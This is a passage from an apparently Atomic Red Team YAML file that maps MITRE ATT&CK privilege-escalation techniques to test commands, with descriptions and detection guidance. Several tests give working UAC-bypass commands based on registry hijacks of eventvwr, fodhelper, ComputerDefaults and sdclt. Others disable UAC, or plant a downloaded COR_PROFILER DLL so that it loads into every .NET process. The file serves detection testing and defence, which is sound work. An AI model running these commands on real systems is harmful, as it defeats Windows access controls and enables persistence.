PsExec UAC Bypass. Retrieved June - 3, 2016. - source_name: SANS UAC Bypass - - url: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ - description: Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved - May 25, 2017. - source_name: enigma0x3 sdclt app paths - - url: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ - description: Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. - Retrieved May 25, 2017. - source_name: enigma0x3 sdclt bypass - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-07-22T21:36:52.458Z' - created: '2020-01-30T14:24:34.977Z' - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Stefan Kanthak - - Casey Smith - x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring - x_mitre_detection: |- - There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. - - Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example: - - * The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass) - - * The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe and [HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass) - - Analysts should monitor these Registry settings for unauthorized changes. - x_mitre_permissions_required: - - Administrator - - User - x_mitre_effective_permissions: - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '2.0' - x_mitre_defense_bypassed: - - Windows User Account Control - identifier: T1548.002 - atomic_tests: - - name: Bypass UAC using Event Viewer (cmd) - auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 - description: | - Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - Upon execution command prompt should be launched with administrative privelages - supported_platforms: - - windows - input_arguments: - executable_binary: - description: Binary to execute with UAC Bypass - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f - cmd.exe /c eventvwr.msc - cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 - -' - name: command_prompt - - name: Bypass UAC using Event Viewer (PowerShell) - auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b - description: | - PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - Upon execution command prompt should be launched with administrative privelages - supported_platforms: - - windows - input_arguments: - executable_binary: - description: Binary to execute with UAC Bypass - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force - Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force - Start-Process "C:\Windows\System32\eventvwr.msc" - cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse - -ErrorAction Ignore - -' - name: powershell - - name: Bypass UAC using Fodhelper - auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 - description: | - Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. - Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened. - supported_platforms: - - windows - input_arguments: - executable_binary: - description: Binary to execute with UAC Bypass - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f - reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f - fodhelper.exe - cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul - 2>&1 - -' - name: command_prompt - - name: Bypass UAC using Fodhelper - PowerShell - auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa - description: | - PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. - Upon execution command prompt will be opened. - supported_platforms: - - windows - input_arguments: - executable_binary: - description: Binary to execute with UAC Bypass - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force - New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force - Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force - Start-Process "C:\Windows\System32\fodhelper.exe" - cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force - -Recurse -ErrorAction Ignore - -' - name: powershell - - name: Bypass UAC using ComputerDefaults (PowerShell) - auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f - description: | - PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 - Upon execution administrative command prompt should open - supported_platforms: - - windows - input_arguments: - executable_binary: - description: Binary to execute with UAC Bypass - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force - New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force - Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force - Start-Process "C:\Windows\System32\ComputerDefaults.exe" - cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force - -Recurse -ErrorAction Ignore - -' - name: powershell - elevation_required: true - - name: Bypass UAC by Mocking Trusted Directories - auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1 - description: | - Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems - Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch - supported_platforms: - - windows - input_arguments: - executable_binary: - description: Binary to execute with UAC Bypass - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - mkdir "\\?\C:\Windows \System32\" - copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe" - mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe" - cleanup_command: | - rd "\\?\C:\Windows \" /S /Q >nul 2>nul - del "c:\testbypass.exe" >nul 2>nul - name: command_prompt - elevation_required: true - - name: Bypass UAC using sdclt DelegateExecute - auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7 - description: | - Bypasses User Account Control using a fileless method, registry only. - Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe - [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) - Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) - supported_platforms: - - windows - input_arguments: - command.to.execute: - description: Command to execute - type: string - default: cmd.exe /c notepad.exe - executor: - command: | - New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}' - New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" - Start-Process -FilePath $env:windir\system32\sdclt.exe - Start-Sleep -s 3 - cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse - -Force -ErrorAction Ignore - -' - name: powershell - - name: Disable UAC using reg.exe - auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 - description: | - Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 - supported_platforms: - - windows - executor: - command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System - /v EnableLUA /t REG_DWORD /d 0 /f - -' - cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System - /v EnableLUA /t REG_DWORD /d 1 /f - -' - name: command_prompt - elevation_required: true - T1574.012: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.012 - url: https://attack.mitre.org/techniques/T1574/012 - - source_name: Microsoft Profiling Mar 2017 - url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview - description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June - 24, 2020. - - source_name: Microsoft COR_PROFILER Feb 2013 - url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100) - description: Microsoft. (2013, February 4). Registry-Free Profiler Startup - and Attach. Retrieved June 24, 2020. - - source_name: RedCanary Mockingbird May 2020 - url: https://redcanary.com/blog/blue-mockingbird-cryptominer/ - description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved - May 26, 2020. - - source_name: Red Canary COR_PROFILER May 2020 - url: https://redcanary.com/blog/cor_profiler-for-persistence/ - description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation - for persistence. Retrieved June 24, 2020. - - source_name: Almond COR_PROFILER Apr 2019 - url: https://offsec.almond.consulting/UAC-bypass-dotnet.html - description: Almond. (2019, April 30). UAC bypass via elevated .NET applications. - Retrieved June 24, 2020. - - source_name: GitHub OmerYa Invisi-Shell - url: https://github.com/OmerYa/Invisi-Shell - description: Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, - 2020. - - source_name: subTee .NET Profilers May 2017 - url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html - description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET - Profilers. Retrieved June 24, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: COR_PROFILER - description: |- - Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013) - - The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) - - Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) - id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-06-26T16:09:58.920Z' - created: '2020-06-24T22:30:55.843Z' - x_mitre_detection: 'For detecting system and user scope abuse of the COR_PROFILER, - monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and - COR_PROFILER_PATH that correspond to system and user environment variables - that do not correlate to known developer tools. Extra scrutiny should be placed - on suspicious modification of these Registry keys by command line tools like - wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring - for command-line arguments indicating a change to COR_PROFILER variables may - aid in detection. For system, user, and process scope abuse of the COR_PROFILER, - monitor for new suspicious unmanaged profiling DLLs loading into .NET processes - shortly after the CLR causing abnormal process behavior.(Citation: Red Canary - COR_PROFILER May 2020) Consider monitoring for DLL files that are associated - with COR_PROFILER environment variables.' - x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_contributors: - - Jesse Brown, Red Canary - x_mitre_platforms: - - Windows - identifier: T1574.012 - atomic_tests: - - name: User scope COR_PROFILER - auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a - description: | - Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). - The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. - Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. - If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, - the notepad process will not execute with high integrity. - - Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - supported_platforms: - - windows - input_arguments: - file_name: - description: unmanaged profiler DLL - type: Path - default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" - executor: - command: | - Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan - New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null - Write-Host "executing eventvwr.msc" -ForegroundColor Cyan - START MMC.EXE EVENTVWR.MSC - cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" - -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment - -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty - -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore - | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" - -Force -ErrorAction Ignore | Out-Null\n" - name: powershell - - name: System Scope COR_PROFILER - auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 - description: | - Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. - The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity - level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will - still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. - - Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - supported_platforms: - - windows - input_arguments: - file_name: - description: unmanaged profiler DLL - type: Path - default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" - executor: - command: | - Write-Host "Creating system environment variables" -ForegroundColor Cyan - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null - cleanup_command: | - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null - name: powershell - elevation_required: true - - name: Registry-free process scope COR_PROFILER - auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 - description: | - Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. - - Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - supported_platforms: - - windows - input_arguments: - file_name: - description: unamanged profiler DLL - type: Path - default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" - executor: - command: | - $env:COR_ENABLE_PROFILING = 1 - $env:COR_PROFILER = '#{clsid_guid}' - $env:COR_PROFILER_PATH = '#{file_name}' - POWERSHELL -c 'Start-Sleep 1' - cleanup_command: | - $env:COR_ENABLE_PROFILING = 0 - $env:COR_PROFILER = '' - $env:COR_PROFILER_PATH = '' - name: powershell - T1546.001: - technique: - created: '2020-01-24T13:40:47.282Z' - modified: '2020-01-24T13:40:47.282Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - type: attack-pattern - id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c - description: "Adversaries may establish persistence by executing malicious content - triggered by a file type association. When a file is opened, the default program - used to open the file (also called the file association or handler) is checked. - File association selections are stored in the Windows Registry and can be - edited by users, administrators, or programs that have Registry access (Citation: - Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or - by administrators using the built-in assoc utility. (Citation: Microsoft Assoc - Oct 2017) Applications can modify the file association for a given file extension - to call an arbitrary program when a file with the given extension is opened.\n\nSystem - file associations are listed under HKEY_CLASSES_ROOT\\.[extension], - for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler - for that extension located at HKEY_CLASSES_ROOT\\[handler]. The - various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. - For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* - HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe - values of the keys listed are commands that are executed when the handler - opens the file extension. Adversaries can modify these values to continually - execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)" - name: Change Default File Association - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1546.001 - url: https://attack.mitre.org/techniques/T1546/001 - - external_id: CAPEC-556 - source_name: capec - url: https://capec.mitre.org/data/definitions/556.html - - url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs - description: Microsoft. (n.d.). Change which programs Windows 7 uses by default. - Retrieved July 26, 2016. - source_name: Microsoft Change Default Programs - - url: http://msdn.microsoft.com/en-us/library/bb166549.aspx - description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. - Retrieved November 13, 2014. - source_name: Microsoft File Handlers - - url: https://docs.microsoft.com/windows-server/administration/windows-commands/assoc - description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August - 7, 2018. - source_name: Microsoft Assoc Oct 2017 - - url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd - description: Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August - 8, 2018. - source_name: TrendMicro TROJ-FAKEAV OCT 2012 - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Windows Registry - x_mitre_detection: |- - Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. - - User file association preferences are stored under [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys. - - Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. - x_mitre_permissions_required: - - Administrator - - SYSTEM - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1546.001 - atomic_tests: - - name: Change Default File Association - auto_generated_guid: 10a08978-2045-4d62-8c42-1957bbbea102 - description: "Change Default File Association From cmd.exe of hta to notepad.\n\nUpon - successful execution, cmd.exe will change the file association of .hta to - notepad.exe. \n" - supported_platforms: - - windows - input_arguments: - target_extension_handler: - description: txtfile maps to notepad.exe - type: Path - default: txtfile - extension_to_change: - description: File Extension To Hijack - type: String - default: ".hta" - original_extension_handler: - description: File Extension To Revert - type: String - default: htafile - executor: - command: 'assoc #{extension_to_change}=#{target_extension_handler} - -' - cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} - -' - name: command_prompt - elevation_required: true - T1078.004: - technique: - id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 - description: |- - Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) - - Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. - name: Cloud Accounts - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1078.004 - url: https://attack.mitre.org/techniques/T1078/004 - - source_name: AWS Identity Federation - url: https://aws.amazon.com/identity/federation/ - description: Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, - 2020. - - source_name: Google Federating GC - url: https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction - description: Google. (n.d.). Federating Google Cloud with Active Directory. - Retrieved March 13, 2020. - - source_name: Microsoft Deploying AD Federation - url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs - description: Microsoft. (n.d.). Deploying Active Directory Federation Services - in Azure. Retrieved March 13, 2020. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-10-19T16:01:22.090Z' - created: '2020-03-13T20:36:57.378Z' - x_mitre_platforms: - - AWS - - GCP - - Azure - - SaaS - - Azure AD - - Office 365 - x_mitre_data_sources: - - Azure activity logs - - Authentication logs - - AWS CloudTrail logs - - Stackdriver logs - x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal - or malicious behavior, such as accessing information outside of the normal - function of the account or account usage at atypical hours. - x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - atomic_tests: [] - T1546.015: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.015 - url: https://attack.mitre.org/techniques/T1546/015 - - url: https://msdn.microsoft.com/library/ms694363.aspx - description: Microsoft. (n.d.). The Component Object Model. Retrieved August - 18, 2016. - source_name: Microsoft Component Object Model - - url: https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence - description: 'G DATA. (2014, October). COM Object hijacking: the discreet - way of persistence. Retrieved August 13, 2016.' - source_name: GDATA COM Hijacking - - source_name: Endgame COM Hijacking - description: 'Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting - Persistence & Evasion with the COM. Retrieved September 15, 2016.' - url: https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Component Object Model Hijacking - description: "Adversaries may establish persistence by executing malicious content - triggered by hijacked references to Component Object Model (COM) objects. - COM is a system within Windows to enable interaction between software components - through the operating system.(Citation: Microsoft Component Object Model) - \ References to various COM objects are stored in the Registry. \n\nAdversaries - can use the COM system to insert malicious code that can be executed in place - of legitimate software through hijacking the COM references and relationships - as a means for persistence. Hijacking a COM object requires a change in the - Registry to replace a reference to a legitimate system component which may - cause that component to not work when executed. When that system component - is executed through normal system operation the adversary's code will be executed - instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects - that are used frequently enough to maintain a consistent level of persistence, - but are unlikely to break noticeable functionality within the system as to - avoid system instability that could lead to detection. " - id: attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-07-09T13:55:51.172Z' - created: '2020-03-16T14:12:47.923Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: "There are opportunities to detect COM hijacking by searching - for Registry references that have been replaced and through Registry operations - (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary - paths with unknown paths or otherwise malicious content. Even though some - third-party applications define user COM objects, the presence of objects - within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and - should be investigated since user objects will be loaded prior to machine - objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Endgame - COM Hijacking) Registry entries for existing COM objects may change infrequently. - When an entry with a known good path and binary is replaced or changed to - an unusual value to point to an unknown binary in a new location, then it - may indicate suspicious behavior and should be investigated. \n\nLikewise, - if software DLL loads are collected and analyzed, any unusual DLL load that - can be correlated with a COM object Registry modification may indicate COM - hijacking has been performed. " - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Loaded DLLs - - DLL monitoring - - Windows Registry - x_mitre_contributors: - - Elastic - x_mitre_platforms: - - Windows - atomic_tests: [] - T1134.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1134.002 - url: https://attack.mitre.org/techniques/T1134/002 - - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing - description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved - April 21, 2017. - source_name: Microsoft Command-line Logging - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Create Process with Token - description: Adversaries may create a new process with a duplicated token to - escalate privileges and bypass access controls. An adversary can duplicate - a desired access token with DuplicateToken(Ex) and use it with - CreateProcessWithTokenW to create a new process running under - the security context of the impersonated user. This is useful for creating - a new process under the security context of a different 